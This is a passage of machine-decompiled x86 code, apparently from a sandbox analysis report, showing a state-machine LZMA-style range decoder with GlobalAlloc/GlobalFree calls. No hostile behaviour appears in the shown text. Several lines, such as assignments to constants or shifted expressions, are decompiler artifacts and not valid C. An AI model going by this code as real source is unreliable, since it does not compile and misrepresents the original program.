											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
